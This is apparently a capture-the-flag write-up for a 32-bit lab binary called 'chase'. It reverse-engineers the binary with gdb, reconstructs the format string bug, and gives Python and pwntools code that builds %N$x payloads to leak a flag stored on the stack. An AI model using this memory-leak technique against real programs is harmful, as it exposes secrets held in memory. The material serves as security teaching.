chase
Leaking data off the stack using format strings.
This is an exciting binary. It has no canary and no PIE, but its input is read with a bounded call to fgets(), meaning we still can't truly stack smash. What can we do?
The first thing we notice is that the program does nothing when we run it. We'll see later that this is because the binary checks that a file called flag.txt exists in the same directory; otherwise, it stops execution. We can create a dummy file to get around this. I use the same flag every time:
This loads flag{temporary_flag} into the flag file. I use this (1) because it's sufficiently long and looks like a flag I might see, and (2) because it has the flag braces so I can easily find it in memory.
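A minimal Python sketch for creating the dummy file, assuming the binary opens flag.txt relative to the current working directory (the variable names are illustrative):

```python
from pathlib import Path

# Dummy flag from the text: long enough to look realistic and easy to spot in memory.
DUMMY_FLAG = "flag{temporary_flag}"

# Assumption: the binary looks for "flag.txt" in the directory it is run from.
flag_path = Path("flag.txt")
flag_path.write_text(DUMMY_FLAG + "\n")

# Read it back to confirm the contents.
print(flag_path.read_text())
```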
With that out of the way, we can now run the binary. It asks for some input and prints it back to us. Let's dive deeper and check for vulnerable code.
We can use checksec to see what protections are enabled on the binary:
As expected, there's nothing super shocking here. No canary, PIE disabled, NX enabled. Shellcode is off the table, but buffer overflows aren't yet.
Checking gdb, we make the following observations:
The only function that seems to be written by the author is main().
main() calls several interesting functions. The most important of these are fopen(), fgets(), puts(), and printf().
There is a call to exit(), but we can assume, based on earlier findings, that this is because the binary checks for the flag file's existence.
Let's break this code down and reconstruct what the C source might look like.
Our first significant call is to fopen(). Based on the man pages, we know that fopen() takes two arguments:
The path name of the file to open
The mode to open the file (typically read/write, bytes/chars, etc.)
Using gdb, we can check the arguments:
GEF, a gdb extension, will guess the arguments for us:
If we didn't have GEF, we could check the stack:
fopen() returns a FILE*, which is eventually stored on the stack at ebp-0xc. There's a check afterward to make sure that its value is not NULL, but we can ignore that for now.
The next call is to fgets(). We can check the arguments in the same way:
This isn't super helpful to us. We know that fgets() takes three arguments:
The buffer to read into (in this case, 0xf7ffda40)
The maximum number of bytes to store, including the terminating null byte (in this case, 0x64, or 100 bytes)
The file to read from (in this case, 0x0804d1a0)
The first and third ones make little sense until we check the assembly.
The first parameter is the address ebp-0x70, which is where we are writing. The second argument is clearly 0x64. The third argument is the value at ebp-0xc, which is the FILE* from fopen().
What does this mean?
This tells us that we're reading up to 100 bytes from the flag file into the buffer at ebp-0x70.
None of the puts() calls are really important to us, so we're going to skip those. Then we reach the second call to fgets().
The first argument is the address ebp-0xd4, which is where we are writing. The second argument is clearly 0x64. The third argument is the value at ebx-0x4.
We see that the third argument is stdin, which makes sense because we've been looking for a function that takes keyboard input.
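The offsets above also explain why this read cannot overflow into anything useful. The sketch below only does the arithmetic; it assumes the input buffer runs from ebp-0xd4 up to the start of the flag buffer at ebp-0x70, which is inferred from the disassembly rather than confirmed by source code.

```python
# Offsets below ebp, taken from the two fgets() calls discussed above.
INPUT_BUF_OFFSET = 0xD4  # second fgets() writes to ebp-0xd4 (our input)
FLAG_BUF_OFFSET = 0x70   # first fgets() writes to ebp-0x70 (the flag)
FGETS_SIZE = 0x64        # size argument passed to both calls

# Bytes between the start of the input buffer and the start of the flag buffer.
gap = INPUT_BUF_OFFSET - FLAG_BUF_OFFSET

# fgets(buf, n, stream) stores at most n-1 characters plus a terminating NUL,
# so it never writes more than n bytes in total.
max_written = FGETS_SIZE

print(f"gap between buffers: {gap} bytes")
print(f"max bytes written by fgets: {max_written}")
print(f"can the input spill past its buffer: {max_written > gap}")
```

Under that assumption, the input fits exactly in the space below the flag buffer, so the bug we need has to come from somewhere other than a classic overflow.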
Last, we see that there is a call to printf(). We can check the arguments in the same way:
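We see that the buffer we just read from stdin is passed to printf() as its first argument, the format string. This is the format string bug: user-controlled input is used as the format string itself instead of being passed as an argument to a fixed format such as "%s".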
Based on all this information, we can reassemble the C code (at least the important parts):
We know that the flag is being loaded onto the stack. It's our job to use the format string bug to find where it is. Without gdb, this would be a very annoying challenge.
Why?
You can answer this question by running it. After a certain number of format specifiers, you'll start to print your own input from the buffer. This makes it hard to decipher what's going on.
We can use gdb to find the flag. If we break right before the fgets() call that reads from stdin, we can see what's on the stack when we enter the format specifiers.
This is why we use flag{temporary_flag} as the contents of flag.txt: the string flag, read as a little-endian 32-bit word, is 0x67616c66, which is easy to spot in a stack dump. We see that it starts at 0xffffd568, which we can verify:
We count that this starts at the 30th word on the stack. We can verify this using the format specifier in our input:
We count that the flag spans words 30 to 36.
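To see why 0x67616c66 is the value to look for, the sketch below splits the dummy flag into 4-byte chunks and reads each as a little-endian 32-bit word, which is how they show up in a 32-bit x86 stack dump. It uses only the dummy flag from earlier; the real stack may hold extra bytes (such as a newline) after it.

```python
import struct

DUMMY_FLAG = b"flag{temporary_flag}"  # 20 bytes, so exactly five 4-byte words

# Interpret each 4-byte chunk as a little-endian unsigned 32-bit integer.
words = [
    struct.unpack("<I", DUMMY_FLAG[i:i + 4])[0]
    for i in range(0, len(DUMMY_FLAG), 4)
]

for word in words:
    print(hex(word))
```

The first value printed is 0x67616c66, the bytes of "flag" in reverse order.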
Rather than doing this manually, we want to process the data to print out the flag easily. Let's see what this looks like.
The first thing we want to do is build the payload. Rather than typing it manually, we can use Python f-strings to build it for us.
This code cycles from idx=30 to idx=36 (the stop value passed to range is one past the last index, because range excludes its stop value). It then uses an f-string to put the index in the right place (e.g. %30$x). Because f-strings produce str rather than bytes, we have to use .encode() to convert the string to bytes. Then, we append it to our payload.
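A minimal sketch of that payload builder, assuming the flag occupies words 30 through 36 as counted earlier (the constant names are illustrative):

```python
# Assumption: the flag sits in stack words 30..36, as counted in gdb.
FIRST_WORD = 30
LAST_WORD = 36

payload = b""
for idx in range(FIRST_WORD, LAST_WORD + 1):  # +1 because range() excludes the stop value
    # %<idx>$x prints the idx-th argument word as hex; the trailing space separates words.
    payload += f"%{idx}$x ".encode()

print(payload)
```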
Next, we send off the payload and receive the data:
Now, we need to process the data. Let's do this one step at a time:
We know the data is in word-sized chunks, delimited by spaces.
Each chunk is up to eight hex characters representing four bytes, meaning that each pair of hex characters needs to be converted to one byte.
Each chunk is in little-endian, meaning once we have the bytes, we need to reverse them.
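The three steps above can be sketched as follows. The `data` value is a hypothetical leak, constructed by hand from the dummy flag rather than captured from the binary. The zfill(8) call is an added precaution: %x drops leading zeros, so a word such as 0x0000000a would otherwise print as just "a".

```python
import binascii

# Hypothetical output of the format string payload for flag{temporary_flag}.
data = b"67616c66 6d65747b 61726f70 665f7972 7d67616c"

# Step 1: split the space-delimited output into word-sized chunks.
chunks = data.decode().split()

flag = ""
for chunk in chunks:
    # Pad back to 8 hex digits in case %x dropped leading zeros.
    chunk = chunk.zfill(8)
    # Step 2: turn each pair of hex characters into one byte.
    raw = binascii.unhexlify(chunk)
    # Step 3: the word was stored little-endian, so reverse the byte order.
    flag += raw[::-1].decode()

print(flag)
```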
This will print our flag! We can do this entire process in one big step:
Let's think about it:
For each item in the split data (i.e. data_arr), it's using binascii.unhexlify to convert the data from a hex string to bytes.
From there, we are reversing the data (i.e. [::-1]) and converting it to a string (i.e. .decode()).
Finally, we are printing the data without a newline (i.e. end=''). This way, we don't even have to store the data and then worry about using ''.join().
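A compact sketch of the one-step version described above. The contents of data_arr here are a hypothetical leak built from the dummy flag, not output captured from the binary.

```python
import binascii

# Hypothetical leak, already split on spaces.
data_arr = "67616c66 6d65747b 61726f70 665f7972 7d67616c".split()

for word in data_arr:
    # hex -> bytes, reverse for little-endian, decode to text, print without a newline
    print(binascii.unhexlify(word)[::-1].decode(), end='')
print()  # finish the line once the whole flag has been printed
```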
Here is the full exploit:
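A sketch of how the pieces might fit together using pwntools. Several things here are assumptions rather than facts from the binary: the path ./chase (taken from the page title), the function names, the timeout, and the idea that the leaked words are the last line the program prints.

```python
import binascii


def build_payload(first=30, last=36):
    """Build b'%30$x %31$x ... ' for the given (inclusive) word range."""
    return b"".join(f"%{idx}$x ".encode() for idx in range(first, last + 1))


def decode_leak(line):
    """Turn space-separated hex words back into the string they spell."""
    out = b""
    for word in line.split():
        # Pad to 8 hex digits (%x drops leading zeros), then undo little-endian order.
        out += binascii.unhexlify(word.zfill(8))[::-1]
    # Stop at the first NUL byte and strip the trailing newline read from the file.
    return out.split(b"\x00")[0].decode(errors="replace").strip()


def run(binary_path="./chase"):
    """Assumption: the binary is at ./chase and prints the leak on its last line."""
    from pwn import process  # pwntools, imported lazily so the helpers work without it

    p = process(binary_path)
    p.sendline(build_payload())
    output = p.recvall(timeout=2)
    leak_line = output.strip().splitlines()[-1]
    return decode_leak(leak_line)
```

With pwntools installed and the binary in place, calling print(run()) should print the flag if those assumptions hold.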